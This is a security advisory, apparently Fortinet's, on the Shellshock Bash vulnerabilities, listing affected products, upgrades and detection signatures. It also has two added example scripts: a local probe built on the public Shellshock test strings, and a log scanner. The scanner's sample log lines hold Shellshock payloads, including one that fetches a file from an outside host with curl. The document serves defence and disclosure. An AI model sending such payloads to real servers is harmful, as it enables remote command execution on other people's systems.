Remote Code Execution Vulnerability in Bash (Shellshock)

Summary

A vulnerability has been discovered in GNU Bourne Again Shell (Bash) versions 1.14.0 through 4.3 (CVE-2014-6271, "Shellshock"). Bash imports function definitions from environment variables, and affected versions keep parsing and executing whatever commands follow the function body. An attacker who can place a crafted string in an environment variable of a process that invokes Bash (for example, an HTTP header that a web server exports to a CGI script) can therefore execute arbitrary commands remotely with the privileges of that process.


Update: Mon Sep 29 - This advisory has been updated to include the additional Bash flaws reported as CVE-2014-6277 and CVE-2014-6278. The fixed releases of the affected products address all four CVEs (CVE-2014-6271, CVE-2014-7169, CVE-2014-6277 and CVE-2014-6278).


Additional updates will follow.


Update June 1st 2021: The list of impacted products has been updated to include FortiWLC.

Impact Detail

Remote code execution. Any component that passes attacker-influenced input into the environment of a process that runs Bash, directly or through a shell-invoking library call, allows the attacker to run arbitrary commands with that process's privileges. Exploitation requires an exposed service that sets environment variables from remote input; for the products listed below, the affected interfaces are noted together with whether authentication is required. The Sep 29 update extends the scope to CVE-2014-6277 and CVE-2014-6278, and the fixed releases address all four CVEs.
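To check whether a host's own Bash carries these flaws, the probe below runs the publicly circulated test strings for the four CVEs against a given bash binary. It is an added example, not part of this advisory or any Fortinet tooling; it assumes a POSIX sh with mktemp and a bash binary on the PATH (or one passed as the first argument), and it is meant for a test host, not a production appliance. The function names and output format are the example's own.

```sh
#!/bin/sh
# Added example (not from the advisory): probe a Bash binary for the four
# Shellshock CVEs the advisory covers. The test strings are the publicly
# circulated ones; on a patched Bash (function import restricted to the
# BASH_FUNC_* naming scheme) none of them has any effect.
#
# Usage: shellshock_probe [/path/to/bash]
# Return: 0 = no check fired, 1 = at least one check fired, 2 = bash not found

shellshock_probe() {
    bash_bin="${1:-bash}"
    status=0

    if ! command -v "$bash_bin" >/dev/null 2>&1; then
        echo "shellshock_probe: $bash_bin not found" >&2
        return 2
    fi

    # CVE-2014-6271: a child bash importing the variable runs the commands
    # that follow the function body, before -c ':' is even looked at.
    out=$(env x='() { :;}; echo VULNERABLE' "$bash_bin" -c ':' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "CVE-2014-6271: vulnerable"; status=1 ;;
        *)            echo "CVE-2014-6271: not vulnerable" ;;
    esac

    # CVE-2014-7169: the first fix left a parser bug; the dangling '>' is
    # applied to the next command, so 'echo date' creates a file named 'echo'.
    # Run in a scratch directory so the stray file is contained.
    tmp=$(mktemp -d) || return 2
    ( cd "$tmp" && env X='() { (a)=>\' "$bash_bin" -c 'echo date' >/dev/null 2>&1 )
    if [ -e "$tmp/echo" ]; then
        echo "CVE-2014-7169: vulnerable"; status=1
    else
        echo "CVE-2014-7169: not vulnerable"
    fi
    rm -rf "$tmp"

    # CVE-2014-6277: parser memory corruption on import. There is no output
    # to look for; a crash (exit status 128+signal) is the tell.
    rc=0
    env x='() { x() { _; }; x() { _; } <<a; }' "$bash_bin" -c ':' >/dev/null 2>&1 || rc=$?
    if [ "$rc" -ge 128 ]; then
        echo "CVE-2014-6277: vulnerable (bash crashed on import)"; status=1
    else
        echo "CVE-2014-6277: not vulnerable"
    fi

    # CVE-2014-6278: command execution through the redirection parser,
    # reachable even after the CVE-2014-7169 fix.
    out=$(env x='() { _; } >_[$($())] { echo VULNERABLE; }' "$bash_bin" -c ':' 2>/dev/null)
    case "$out" in
        *VULNERABLE*) echo "CVE-2014-6278: vulnerable"; status=1 ;;
        *)            echo "CVE-2014-6278: not vulnerable" ;;
    esac

    return "$status"
}

shellshock_probe "$@"
```

A clean result from this probe only says that the local Bash is fixed; an appliance is still exposed if it ships its own Bash, which is why the product upgrades below are needed regardless of the host's package state.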

Affected Products

FortiAnalyzer version 4.x, 5.0.0 through 5.0.7 and 5.2.0
FortiManager version 4.x, 5.0.0 through 5.0.7 and 5.2.0
FortiAuthenticator version 1.x, 2.x, 3.0.x and 3.1.0 through 3.1.1
Authentication is required to exploit the above 3 products


FortiDB versions 4.x, 5.0.x and 5.1.1 and below
FortiWLC versions 8.x, 8.5.0 through 8.5.3 and 8.6.0
Only 32-bit FortiWLC Wireless Controllers are impacted.

Solutions

FortiAnalyzer


Please upgrade to FortiAnalyzer version 5.2.1 or above
Please upgrade to FortiAnalyzer version 5.0.8 or above


FortiAuthenticator


Please upgrade to FortiAuthenticator version 3.1.2 or above


FortiDB


Please upgrade to FortiDB version 5.1.5 or above


FortiManager


Please upgrade to FortiManager version 5.2.1 or above
Please upgrade to FortiManager version 5.0.8 or above


FortiWLC


Please upgrade to FortiWLC version 8.5.4 or above.
Please upgrade to FortiWLC version 8.6.1 or above.


Workarounds


FortiGate customers may apply the IPS signature entitled "Bash.Function.Definitions.Remote.Code.Execution" to protect systems accessible through a FortiGate. This IPS signature is available in the 5.552 IPS update, which will be deployed via FDS on the afternoon of September 25th.
FortiGuard Labs has created an AV signature for this vulnerability and it was deployed using the Hot Update functionality. It is advised that all FortiGate customers ensure they are using AV DB 22.863 or later to help protect systems.
FortiGuard Web Security Service for the FortiWeb web application firewall was updated overnight to address the Shellshock vulnerability. Updated package 0.00116 includes signature 090420001, which blocks attempts to execute arbitrary commands over HTTP via specially crafted Bash environment variable strings (CVE-2014-6271, CVE-2014-7169). FortiWeb applies signature 090420001 to URLs, arguments, headers and cookies. The signature is part of the Known Exploits category and is enabled by default.
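The FortiWeb and IPS signatures above key on the function-definition prefix that every Shellshock payload has to carry, wherever it lands in the request. The script below, an added example that is not part of this advisory, applies the same idea to web-server access logs with grep and awk; the log lines are constructed for the example, the regular expression and function names are the example's own, and a real deployment would read the live log file instead of the embedded sample.

```sh
#!/bin/sh
# Added example (not from the advisory): flag Shellshock attempts in web-server
# access logs. The trigger is the function-definition prefix '() {' appearing
# in a logged header, cookie, URL or argument value. The lines below are
# constructed for the example, not real traffic.

SAMPLE_LOG='203.0.113.7 - - [25/Sep/2014:03:12:41 +0000] "GET /cgi-bin/status.sh HTTP/1.1" 200 55 "-" "() { :;}; /bin/bash -c \"id\""
198.51.100.12 - - [25/Sep/2014:03:13:02 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.7 - - [25/Sep/2014:03:13:30 +0000] "GET /cgi-bin/test.cgi HTTP/1.1" 500 0 "() { _; }; /usr/bin/curl http://203.0.113.9/x" "-"
192.0.2.44 - - [25/Sep/2014:03:14:10 +0000] "POST /login?user=x HTTP/1.1" 302 0 "-" "curl/7.37.0"'

# '()' followed by optional whitespace and '{'. Matching the prefix rather
# than a specific command catches variants regardless of the payload behind it.
SHELLSHOCK_RE='\(\)[[:space:]]*\{'

# Print the matching log lines read from stdin.
shellshock_hits() {
    grep -E "$SHELLSHOCK_RE"
}

# Count matching lines from stdin; always prints a number, even when it is 0
# (grep -c exits 1 on no match, which we do not want to propagate).
shellshock_hit_count() {
    grep -Ec "$SHELLSHOCK_RE" || true
}

# Deduplicated source IPs that sent a payload, ready for a block list.
shellshock_sources() {
    grep -E "$SHELLSHOCK_RE" | awk '{print $1}' | sort -u
}

printf '%s\n' "$SAMPLE_LOG" | shellshock_hits
```

This only sees what the web server logs (typically the request line, Referer and User-Agent); payloads carried in other headers or cookies will not appear unless those fields are logged, which is the gap an inline signature such as the FortiWeb one closes.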
Please be sure to back up your affected systems prior to update and read the respective release notes when performing any software upgrade. Firmware release dates for impacted products are pending and this advisory will be updated when available.